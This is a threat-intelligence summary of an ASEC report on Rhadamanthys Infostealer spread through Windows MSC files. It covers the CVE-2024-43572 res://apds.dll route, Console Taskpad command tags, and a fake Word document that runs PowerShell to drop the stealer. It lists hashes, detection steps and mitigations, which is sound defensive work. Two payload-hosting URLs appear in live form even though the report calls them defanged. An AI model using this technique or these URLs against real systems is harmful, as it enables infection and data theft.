Full Report
AhnLab SEcurity intelligence Center (ASEC) has confirmed that Rhadamanthys Infostealer is being distributed as a file with the MSC extension. The MSC extension is an XML-based format that is executed by the Microsoft Management Console (MMC), and it can register and execute various tasks such as script code and command execution, and program execution. There […]
Analysis Summary
# Tool/Technique: MSC Container / Rhadamanthys Infostealer Delivery
## Overview
This summary describes the distribution and execution mechanisms of malware utilizing the **.MSC (Microsoft Management Console Console)** file extension as a container, specifically focusing on how it delivers the **Rhadamanthys Infostealer**. Two primary execution methods are detailed: one exploiting a DLL vulnerability and another leveraging native MMC functionality via Console Taskpad.
## Technical Details
- Type: Malware Delivery Mechanism/Container (MSC file executing Rhadamanthys)
- Platform: Windows
- Capabilities: Execution of arbitrary code or commands via MMC features or exploitation of a specific DLL vulnerability.
- First Seen: Distribution of MSC malware saw a rise in June 2024.
## MITRE ATT&CK Mapping
The analysis suggests mappings related to delivery, execution, and defense evasion depending on the specific attack chain used:
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell (Applicable to the Taskpad method executing `command` or PowerShell)
- **TA0005 - Defense Evasion**
- T1218 - Signed Binary Proxy Execution (If an attacker utilizes legitimate MMC components)
## Functionality
### Core Capabilities
MSC files allow for the registration and execution of various tasks, including script code, command execution, and program execution, by exploiting Microsoft Management Console features.
### Advanced Features
1. **Vulnerability Exploitation (CVE-2024-43572):** Utilizes the `res://` protocol to access the `redirect.html` resource within `apds.dll`. This resource executes code found after `target=` using `.exec()`, running the code directly within the vulnerable DLL instance, bypassing standard MMC execution flows.
2. **Console Taskpad Execution:** Interprets and executes commands enclosed within `<task:command>` and `</task:command>` tags within the MSC file, leveraging native MMC functionality to execute commands (e.g., the `command` command).
3. **Phased Delivery (Taskpad example):** The MSC file is disguised as an MS Word document; upon opening, it downloads and executes a PowerShell script, which subsequently drops and runs the **Rhadamanthys Infostealer** executable (named `eRSg.mp3` in the `%LocalAppData%` directory).
## Indicators of Compromise
- File Hashes:
- MD5: `560024efca8e5730dc4decf2e2c252db`, `7b26a25d7bf2be6fdc2810ba5f519b4a`, `9b738d877e6590b40c2784be10c215d7`
- File Names:
- Payload Dropped: `eRSg.mp3` (Rhadamanthys Infostealer)
- Registry Keys: [Not explicitly mentioned]
- Network Indicators (Defanged):
- URL: `https://daddychill.nl:1537/77950e0740519/udpne49n.du0i8`
- URL: `https://oshi.at/SdUr/TSWY.txt`
- Behavioral Indicators:
- Execution of scripts via PowerShell initiated by an MSC process.
- Creation of executables in the `%LocalAppData%` directory.
## Associated Threat Actors
The article explicitly names the payload delivered as **Rhadamanthys Infostealer**, though the specific threat group using this MSC delivery method is not named in the provided context.
## Detection Methods
- Signature-based detection: Signatures for the known MD5 hashes.
- Behavioral detection: Monitoring for process creation chains where `.MSC` files initiate PowerShell execution or attempts to use the `res://` protocol targeting `apds.dll`.
- YARA rules: [Not available in context]
## Mitigation Strategies
- Patching: Users should ensure systems are patched against **CVE-2024-43572** to mitigate the DLL exploitation vector.
- User Education: Caution users regarding opening `.MSC` files from unknown or unexpected sources, especially those disguised as other document types (like MS Word).
- Application Control: Restrict execution of scripts or binaries downloaded by Office applications or unexpected file handlers.
## Related Tools/Techniques
- **Rhadamanthys Infostealer:** The payload being delivered via this MSC mechanism.
- **CVE-2024-43572:** The specific vulnerability in `apds.dll` exploited by the first MSC variant.
- **Microsoft Management Console (MMC):** The native Windows component leveraged by the second variant.